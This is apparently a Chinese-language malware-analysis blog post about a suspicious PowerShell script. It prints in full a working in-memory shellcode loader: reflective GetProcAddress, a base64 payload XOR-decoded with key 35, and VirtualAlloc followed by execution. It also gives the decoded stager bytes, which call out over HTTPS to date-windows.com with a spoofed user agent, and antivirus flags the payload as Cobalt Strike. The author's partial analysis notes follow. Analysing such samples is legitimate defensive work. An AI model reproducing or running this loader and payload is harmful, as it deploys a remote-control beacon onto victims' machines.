Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

又见字符串：

38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb

可在powershell中执行：

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

异或后：

将数字16进制转换：

content = "252 232 137 0 0 0 96 137 229 49 210 100 139 82 48 139 82 12 139 82 20 139 114 40 15 183 74 38 49 255 49 192 172 60 97 124 2 44 32 193 207 13 1 199 226 240 82 87 139 82 16 139 66 60 1 208 139 64 120 133 192 116 74 1 208 80 139 72 24 139 88 32 1 211 227 60 73 139 52 139 1 214 49 255 49 192 172 193 207 13 1 199 56 224 117 244 3 125 248 59 125 36 117 226 88 139 88 36 1 211 102 139 12 75 139 88 28 1 211 139 4 139 1 208 137 68 36 36 91 91 97 89 90 81 255 224 88 95 90 139 18 235 134 93 104 110 101 116 0 104 119 105 110 105 84 104 76 119 38 7 255 213 232 0 0 0 0 49 255 87 87 87 87 87 104 58 86 121 167 255 213 233 164 0 0 0 91 49 201 81 81 106 3 81 81 104 187 1 0 0 83 80 104 87 137 159 198 255 213 80 233 140 0 0 0 91 49 210 82 104 0 50 192 132 82 82 82 83 82 80 104 235 85 46 59 255 213 137 198 131 195 80 104 128 51 0 0 137 224 106 4 80 106 31 86 104 117 70 158 134 255 213 95 49 255 87 87 106 255 83 86 104 45 6 24 123 255 213 133 192 15 132 202 1 0 0 49 255 133 246 116 4 137 249 235 9 104 170 197 226 93 255 213 137 193 104 69 33 94 49 255 213 49 255 87 106 7 81 86 80 104 183 87 224 11 255 213 191 0 47 0 0 57 199 117 7 88 80 233 123 255 255 255 49 255 233 145 1 0 0 233 201 1 0 0 232 111 255 255 255 47 105 90 99 54 0 228 252 193 16 215 124 98 24 9 249 225 6 76 3 15 113 228 80 9 86 237 10 219 87 168 67 59 186 14 163 172 126 140 15 84 213 234 12 92 195 44 37 12 71 208 23 47 23 48 194 11 36 221 4 26 234 11 51 191 221 239 170 107 79 96 164 108 199 178 77 238 248 20 0 85 115 101 114 45 65 103 101 110 116 58 32 77 105 99 114 111 115 111 102 116 32 78 84 80 32 118 32 49 46 48 13 10 0 141 52 138 162 176 56 52 198 42 46 63 51 127 153 129 193 189 252 204 232 77 235 38 200 234 184 27 28 74 160 130 123 66 162 152 23 140 14 30 67 13 122 103 104 212 93 128 20 243 89 208 70 194 122 210 194 96 242 143 203 236 189 135 104 78 20 77 215 138 161 136 35 182 253 132 246 62 90 192 206 79 75 205 16 6 8 145 27 47 55 252 48 113 117 153 15 38 142 77 246 11 174 122 199 196 147 198 44 70 63 167 191 22 174 102 168 212 116 168 167 1 86 251 26 222 138 125 189 138 238 176 55 30 108 80 22 125 21 125 202 150 117 120 66 8 181 124 226 121 104 54 141 216 48 188 35 227 103 135 127 66 124 19 173 7 125 230 117 0 36 1 8 108 33 37 130 46 67 53 196 38 136 170 250 48 115 104 178 111 17 79 138 33 228 26 245 125 175 127 145 88 183 154 225 121 211 113 212 28 231 16 4 184 160 49 192 126 83 36 8 82 101 206 78 6 114 41 64 136 97 165 38 144 54 181 49 199 164 32 220 194 160 82 122 41 16 159 150 118 203 253 14 11 230 175 130 28 187 19 252 145 199 210 127 161 207 150 17 3 0 104 240 181 162 86 255 213 106 64 104 0 16 0 0 104 0 0 64 0 87 104 88 164 83 229 255 213 147 185 0 0 0 0 1 217 81 83 137 231 87 104 0 32 0 0 83 86 104 18 150 137 226 255 213 133 192 116 198 139 7 1 195 133 192 117 229 88 195 232 137 253 255 255 116 105 109 101 46 100 97 116 101 45 119 105 110 100 111 119 115 46 99 111 109 0 18 52 86 120"


hex_arrays = content.split(' ')
# hex_bytes = bytes.fromhex(content)
print(hex_arrays)
pe_list = []
# int_arrs = list(map(int, hex_arrays))
for hex_array in range(len(hex_arrays)):
    int_array = '0x%02x' % (int(hex_arrays[hex_array], 10))
    pe_list.append(int_array)


pe_str = "".join(pe_list).replace("0x", "")
content = binascii.a2b_hex(pe_str)
with open("ps_shellcode", 'wb') as pe_file:
    pe_file.write(content)

生成shellcode：

在使用恶意代码分析利器scdbg.exe进行分析，虽然看不太懂，不过依样画葫芦，感觉未有啥恶意痕迹：

静态分析：

涉及到的域名date-windows.com目前并未注册：

一乐：

后续接上

12-01更新 昨天看到域名未注册，觉得应该是非恶意文件了，刚把shellcode放微步查了下行为：

shellcode如何调用 如何执行的，没有了解，还需要进一步学习ing：

通过shellcode加载器，在加载payload后

杀毒软件拦截提示CS：

（突然觉得不适合干这行…）

所以ok.exe是咋的来的呢。。。所以这shellcode到底干啥了、、、、